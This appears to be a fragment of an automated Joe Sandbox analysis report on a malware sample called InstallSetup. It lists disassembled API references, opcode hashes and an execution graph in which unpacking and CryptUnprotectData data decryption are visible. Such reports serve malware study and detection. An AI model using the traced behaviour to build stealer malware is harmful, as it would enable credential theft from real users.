                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0095291A
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00952928
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                • String ID:
                                                                                                • API String ID: 4286982218-0
                                                                                                • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                • Instruction ID: f1f308d22af4904c29f7d13b526aa7c12d18599ad9910820a997a3e9a078026d
                                                                                                • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                • Instruction Fuzzy Hash: 8EE0863450010967CB14FF72CD0ABBF376C6B01742F500925BC15D20A1EF35D5088798
                                                                                                APIs
                                                                                                • TlsSetValue.KERNEL32(?,00000000,00957BD8,00000000,?,?,00950DA0,?,?,?,00000000,?,00000000), ref: 009529BE
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 009529CA
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009529E0
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 009529EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                • String ID:
                                                                                                • API String ID: 1964976909-0
                                                                                                • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                • Instruction ID: faf36c6e578d5a73cbcef5e6eca5f6e379e710116df6fa65f85be8dac6ffbb71
                                                                                                • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                • Instruction Fuzzy Hash: 02E086351001096BDB10FF71CD0ABBF376C6F01742F500925BD19E20A1EF35D51897A8
                                                                                                APIs
                                                                                                • SetThreadPriority.KERNEL32(?,?), ref: 00412691
                                                                                                • GetLastError.KERNEL32 ref: 0041269D
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004126C1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                • String ID:
                                                                                                • API String ID: 4286982218-0
                                                                                                • Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                • Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
                                                                                                • Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
                                                                                                • Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C
                                                                                                APIs
                                                                                                • TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412787
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                • String ID:
                                                                                                • API String ID: 1964976909-0
                                                                                                • Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                • Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
                                                                                                • Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
                                                                                                • Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C
                                                                                                APIs
                                                                                                • TlsAlloc.KERNEL32(?,00950DA0), ref: 0095295F
                                                                                                • GetLastError.KERNEL32 ref: 0095296C
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00952982
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00952990
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3103352999-0
                                                                                                • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                • Instruction ID: 3f66f9ea9ae83a8d17a5f2ee9669f6a8c545a4c53a46936d5ee10e68e24a5ed3
                                                                                                • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                • Instruction Fuzzy Hash: 7FE0C230000105678714FBB99C4EB7F32AC6A02752FA40B25F861E20E1EA68D40C43A8
                                                                                                APIs
                                                                                                • TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
                                                                                                • GetLastError.KERNEL32 ref: 00412705
                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00412729
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3103352999-0
                                                                                                • Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0042F10D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                • Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
                                                                                                • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                • Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0097B32B,?,00000050,?,?,?,?,?), ref: 0097B1AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction ID: abe42c7bb98321e04d39beffb515d5e5b36c7d3dc5be50f2cceb26a5793da33c
                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction Fuzzy Hash: 92213D63B18105AAEB249E648D22BA763AEEF94B61F97C524E90DD7204F732DD40C394
                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
                                                                                                • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                • Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
                                                                                                APIs
                                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
                                                                                                • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodersGdipImage$Size
                                                                                                • String ID: image/png
                                                                                                • API String ID: 864223233-2966254431
                                                                                                • Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                • Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
                                                                                                • Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
                                                                                                • Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
                                                                                                APIs
                                                                                                • SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID: F(@
                                                                                                • API String ID: 1452528299-2698495834
                                                                                                • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                • Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
                                                                                                • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                • Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
                                                                                                APIs
                                                                                                • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___std_exception_destroy
                                                                                                • String ID: F(@$ios_base::failbit set
                                                                                                • API String ID: 4194217158-1828034088
                                                                                                • Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catch
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 3886170330-2084237596
                                                                                                • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                APIs
                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                  • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                  • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                  • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                  • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                • String ID: F@
                                                                                                • API String ID: 2118720939-885931407
                                                                                                • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                APIs
                                                                                                • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                  • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                Strings
                                                                                                • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                • String ID: Access violation - no RTTI data!
                                                                                                • API String ID: 2053020834-2158758863
                                                                                                • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                APIs
                                                                                                • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                • String ID: zB$~B
                                                                                                • API String ID: 3275300208-395995950
                                                                                                • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                APIs
                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                • String ID: pThreadProxy
                                                                                                • API String ID: 1687795959-3651400591
                                                                                                • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00942AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00942AAD,00000000), ref: 0096B187
                                                                                                • GetLastError.KERNEL32 ref: 0096B195
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00942AAD,00000000), ref: 0096B1F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                • Instruction ID: 6a6d59bed4db325f0a58273d489c1f4878d5ab0faf870dba3729d32571fb116a
                                                                                                • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                • Instruction Fuzzy Hash: 43410431604216AFCF218F64CC64BBE7BE8EF52710F254169E969E71A1FB308D81CB60
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
                                                                                                • GetLastError.KERNEL32 ref: 0042AF2E
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1717984340-0
                                                                                                • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                • Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
                                                                                                • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                • Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

                                                                                                Execution Graph

                                                                                                Execution Coverage:3.3%
                                                                                                Dynamic/Decrypted Code Coverage:17.2%
                                                                                                Signature Coverage:29.1%
                                                                                                Total number of Nodes:151
                                                                                                Total number of Limit Nodes:9
                                                                                                execution_graph 25633 41f7a0 25634 41f7d0 25633->25634 25634->25634 25635 4218a0 3 API calls 25634->25635 25636 41f7f9 25635->25636 25519 40c583 CoInitializeSecurity 25642 43c767 25644 43c790 25642->25644 25643 43c80e 25644->25643 25646 43c1f0 LdrInitializeThunk 25644->25646 25646->25643 25647 43cce6 25648 43cd00 25647->25648 25648->25648 25650 43cd6e 25648->25650 25654 43c1f0 LdrInitializeThunk 25648->25654 25653 43c1f0 LdrInitializeThunk 25650->25653 25652 43ce4d 25653->25652 25654->25650 25520 43c58a 25522 43c460 25520->25522 25521 43c5f4 25522->25521 25522->25522 25525 43c1f0 LdrInitializeThunk 25522->25525 25524 43c54d 25525->25524 25655 4217ab 25656 4217d0 25655->25656 25656->25656 25657 4218a0 3 API calls 25656->25657 25658 42180b 25657->25658 25659 4218a0 3 API calls 25658->25659 25660 42182a 25659->25660 25526 43c2c8 25527 43c2e0 25526->25527 25527->25527 25528 43ccaf GetForegroundWindow 25527->25528 25529 43ccbe 25528->25529 25661 a50f8e 25662 a50f9d 25661->25662 25665 a5172e 25662->25665 25670 a51749 25665->25670 25666 a51752 CreateToolhelp32Snapshot 25667 a5176e Module32First 25666->25667 25666->25670 25668 a50fa6 25667->25668 25669 a5177d 25667->25669 25672 a513ed 25669->25672 25670->25666 25670->25667 25673 a51418 25672->25673 25674 a51461 25673->25674 25675 a51429 VirtualAlloc 25673->25675 25674->25674 25675->25674 25676 97003c 25677 970049 25676->25677 25689 970e0f SetErrorMode SetErrorMode 25677->25689 25682 970265 25683 9702ce VirtualProtect 25682->25683 25685 97030b 25683->25685 25684 970439 VirtualFree 25688 9704be LoadLibraryA 25684->25688 25685->25684 25687 9708c7 25688->25687 25690 970223 25689->25690 25691 970d90 25690->25691 25692 970dad 25691->25692 25693 970238 VirtualAlloc 25692->25693 25694 970dbb GetPEB 25692->25694 25693->25682 25694->25693 25530 40d38e 25531 40d3b0 25530->25531 25534 437df0 25531->25534 25533 40d4e2 25535 437e10 CoCreateInstance 25534->25535 25537 438042 SysAllocString 25535->25537 25538 438440 25535->25538 25541 4380e7 25537->25541 25540 438450 GetVolumeInformationW 25538->25540 25546 438471 25540->25546 25542 43842f SysFreeString 25541->25542 25543 4380ef CoSetProxyBlanket 25541->25543 25542->25538 25544 438425 25543->25544 25545 43810f SysAllocString 25543->25545 25544->25542 25548 438200 25545->25548 25546->25533 25546->25546 25548->25548 25549 438237 SysAllocString 25548->25549 25550 43825b 25549->25550 25551 438413 SysFreeString SysFreeString 25550->25551 25552 438409 25550->25552 25553 4382a3 VariantInit 25550->25553 25551->25544 25552->25551 25555 4382f0 25553->25555 25554 4383f8 VariantClear 25554->25552 25555->25554 25556 408850 25558 40885f 25556->25558 25557 408acf ExitProcess 25558->25557 25559 408ab8 25558->25559 25560 40891c GetCurrentProcessId GetCurrentThreadId 25558->25560 25563 408ab3 25559->25563 25561 408941 25560->25561 25562 408945 SHGetSpecialFolderPathW GetForegroundWindow 25560->25562 25561->25562 25564 408a3d 25562->25564 25563->25557 25563->25559 25564->25559 25566 40c550 CoInitializeEx 25564->25566 25567 421853 25568 421860 25567->25568 25568->25568 25571 4218a0 25568->25571 25572 4218b7 25571->25572 25587 43e340 25572->25587 25574 42191d 25582 421880 25574->25582 25591 43aa80 25574->25591 25576 421963 25585 4219fc 25576->25585 25594 43c1f0 LdrInitializeThunk 25576->25594 25578 43aaa0 RtlFreeHeap 25579 422007 25578->25579 25579->25582 25600 43c1f0 LdrInitializeThunk 25579->25600 25580 43aa80 RtlAllocateHeap 25580->25585 25583 421ff5 25583->25578 25585->25580 25585->25583 25595 43c1f0 LdrInitializeThunk 25585->25595 25596 43aaa0 25585->25596 25589 43e360 25587->25589 25588 43e4be 25588->25574 25589->25588 25601 43c1f0 LdrInitializeThunk 25589->25601 25602 43d810 25591->25602 25593 43aa8a RtlAllocateHeap 25593->25576 25594->25576 25595->25585 25597 43aab3 25596->25597 25598 43aac4 25596->25598 25599 43aab8 RtlFreeHeap 25597->25599 25598->25585 25599->25598 25600->25579 25601->25588 25603 43d830 25602->25603 25603->25593 25603->25603 25695 435972 25697 43599b 25695->25697 25698 4359c4 25697->25698 25699 43c1f0 LdrInitializeThunk 25697->25699 25699->25697 25700 4214b0 25701 421510 25700->25701 25702 4214be 25700->25702 25704 4215d0 25702->25704 25705 4215e0 25704->25705 25705->25705 25708 43e510 25705->25708 25707 4216df 25709 43e530 25708->25709 25709->25709 25710 43e68e 25709->25710 25712 43c1f0 LdrInitializeThunk 25709->25712 25710->25707 25712->25710 25713 40d835 25715 40d71d 25713->25715 25714 40d7ee 25715->25714 25717 43c1f0 LdrInitializeThunk 25715->25717 25717->25714 25604 415799 25605 41579e 25604->25605 25614 43e6e0 25605->25614 25607 4157b7 25609 4157f8 25607->25609 25618 43e7d0 25607->25618 25613 4158fe 25609->25613 25624 43c1f0 LdrInitializeThunk 25609->25624 25611 415bc6 25612 415b95 CryptUnprotectData 25612->25611 25613->25611 25613->25612 25615 43e700 25614->25615 25615->25615 25616 43e77e 25615->25616 25625 43c1f0 LdrInitializeThunk 25615->25625 25616->25607 25620 43e800 25618->25620 25619 43e94e 25619->25609 25622 43e87f 25620->25622 25626 43c1f0 LdrInitializeThunk 25620->25626 25622->25619 25627 43c1f0 LdrInitializeThunk 25622->25627 25624->25613 25625->25616 25626->25622 25627->25619

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
